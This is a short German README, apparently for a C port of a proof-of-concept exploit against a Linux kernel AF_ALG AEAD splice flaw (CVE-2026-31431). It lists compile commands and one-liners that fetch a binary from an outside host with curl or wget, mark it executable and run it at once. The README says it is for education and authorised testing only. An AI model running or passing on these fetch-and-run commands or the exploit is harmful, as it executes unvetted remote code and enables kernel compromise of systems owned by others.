
C-Port eines Proof-of-Concept, der einen AF_ALG-AEAD-Splice-Logikfehler im Linux-Kernel (CVE-2026-31431) für Bildungsforschung ausnutzt.
Dieses Projekt ist ein C-Port des ursprünglichen Python-Prototyps von offsecguy.
Es nutzt die Linux-Kernel-Krypto-API (AF_ALG) mit:
authencesn(hmac(sha256),cbc(aes)) AEAD-ModusMSG_MORE-Flagsplice()-SystemaufrufDie Technik führt Daten aus einem schreibgeschützten Dateideskriptor durch einen Krypto-Socket und verarbeitet sie blockweise.
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz
gcc exp.c -o exp -lz -s -static
gcc exp.c -o exp -lz -s
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp
AF_ALGzlib zur DekompressionDieser Code wird nur für Bildungs- und Forschungszwecke bereitgestellt.
Verwenden Sie ihn verantwortungsvoll und nur auf Systemen, für deren Test Sie autorisiert sind.